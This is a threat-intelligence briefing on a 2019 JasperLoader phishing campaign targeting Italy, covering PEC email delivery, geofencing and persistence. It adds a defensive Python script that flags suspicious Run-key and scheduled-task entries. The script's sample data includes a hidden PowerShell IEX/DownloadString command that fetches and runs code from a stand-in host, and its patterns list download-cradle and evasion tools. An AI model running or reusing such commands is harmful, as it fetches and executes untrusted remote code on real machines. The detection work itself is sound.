Sorpresa! JasperLoader Targets Italy with a New Bag of Tricks


Sorpresa! JasperLoader Targets Italy with a New Bag of Tricks (May 23, 2019)

JasperLoader, a malware loader first seen this year, has become increasingly active throughout 2019, according to Cisco Talos researchers. A new phishing campaign distributing it targets individuals in Italy. The Italian-language emails are delivered through Italy's certified email service (Posta Elettronica Certificata, PEC), which lends them credibility, and attempt to convince the recipient to follow a URL. Requests to that URL can receive an HTTP 302 response that redirects to the website of the China Internet Network Information Center (CNNIC). Researchers believe this is a geofencing check: only requests originating from the targeted region are served the malicious payload, while requests from elsewhere (including analysts and sandboxes outside Italy) see only a harmless-looking redirect. Once running, JasperLoader establishes persistence via a scheduled task or a registry Run key and is then used to download arbitrary follow-on malware onto the infected machine.
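Because the loader persists through a scheduled task or a registry Run key, those two autostart locations are the natural place to hunt for it on a suspected host. The following Python helper is an added example written for this briefing; it is not code from Cisco Talos or from the malware, and its heuristics (script host, evasive PowerShell switches, user-writable path, download cradle) are generic traits of script-based loaders rather than JasperLoader-specific indicators. The Run-key values and task actions it scores are constructed samples of the kind exported by `reg query` or `schtasks /query /v`; the names and commands in them are hypothetical.

```python
"""
Added example, not part of the Talos report or this briefing: score Windows
autostart entries (Run-key values and scheduled-task actions) for traits
common to script-based loaders. Heuristics are generic, not JasperLoader IOCs.
All sample entries below are constructed for illustration.
"""
import re
from typing import Dict, List, Tuple

# Script hosts that loaders typically hide behind in an autostart entry.
SCRIPT_HOSTS = re.compile(
    r"\b(powershell(\.exe)?|pwsh(\.exe)?|wscript(\.exe)?|cscript(\.exe)?|"
    r"mshta(\.exe)?|rundll32(\.exe)?|regsvr32(\.exe)?|cmd(\.exe)?)\b",
    re.IGNORECASE,
)
# PowerShell switches whose main purpose is to avoid a user noticing.
EVASIVE_FLAGS = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand|w(?:indowstyle)?\s+hidden|"
    r"nop(?:rofile)?|ep\s+bypass|executionpolicy\s+bypass|noni(?:nteractive)?)\b",
    re.IGNORECASE,
)
# Locations a standard user can write to; legitimate autostarts rarely run scripts from here.
USER_WRITABLE = re.compile(
    r"(%appdata%|%localappdata%|%temp%|%tmp%|%public%|"
    r"\\users\\[^\\]+\\appdata\\|\\programdata\\|\\windows\\temp\\)",
    re.IGNORECASE,
)
# Download-cradle fragments that turn a persistence entry into a stager.
DOWNLOAD_CRADLE = re.compile(
    r"(https?://|net\.webclient|downloadstring|downloadfile|"
    r"invoke-webrequest|\biwr\b|bitsadmin|certutil)",
    re.IGNORECASE,
)


def score_command(command: str) -> Tuple[int, List[str]]:
    """Return (score, reasons) for one autostart command line; one point per matched trait."""
    reasons: List[str] = []
    if SCRIPT_HOSTS.search(command):
        reasons.append("script host")
    if EVASIVE_FLAGS.search(command):
        reasons.append("evasive flags")
    if USER_WRITABLE.search(command):
        reasons.append("user-writable path")
    if DOWNLOAD_CRADLE.search(command):
        reasons.append("download cradle")
    return len(reasons), reasons


def triage(run_values: Dict[str, str], tasks: Dict[str, str], threshold: int = 2) -> List[dict]:
    """Flag Run-key values and task actions scoring at or above threshold, highest score first.

    A threshold of 2 means a single trait (e.g. a legitimate per-user app living
    in AppData) is not enough on its own to raise an alert.
    """
    findings = []
    for source, entries in (("run-key", run_values), ("scheduled-task", tasks)):
        for name, command in entries.items():
            score, reasons = score_command(command)
            if score >= threshold:
                findings.append({"source": source, "name": name, "score": score,
                                 "reasons": reasons, "command": command})
    return sorted(findings, key=lambda f: -f["score"])


# Constructed sample data (hypothetical hosts, users, paths and commands).
SAMPLE_RUN_VALUES = {
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
    "OneDrive": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "Updater": r'powershell.exe -nop -w hidden -ep bypass -File "%APPDATA%\upd\run.ps1"',
}
SAMPLE_TASKS = {
    r"\Microsoft\Windows\Defrag\ScheduledDefrag": r"%windir%\system32\defrag.exe -c -h -o -$",
    r"\Update": r"wscript.exe //B //E:vbscript C:\Users\alice\AppData\Roaming\sv.vbs",
    r"\Sync": 'powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\')"',
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_RUN_VALUES, SAMPLE_TASKS):
        print(f"[{finding['score']}] {finding['source']} {finding['name']}: "
              f"{', '.join(finding['reasons'])}")
```

Run against real exports, the script is only a first filter: anything it flags still needs the referenced file pulled and examined, and a loader that persists with an innocuous-looking executable name in a system directory will score zero, so the output should be compared with a known-good baseline of the host rather than treated as a complete check.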

Recommendation: Emails that try to get a user to follow a link should be viewed with scrutiny, especially when they come from individuals with whom you do not typically communicate. Education is the best defense: inform your employees of the dangers of phishing, specifically how it can take place across different forms of online communication, and whom to contact if a phishing attempt is identified. Because this loader persists through scheduled tasks and registry Run keys, defenders should also baseline and monitor those autostart locations on endpoints.

Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.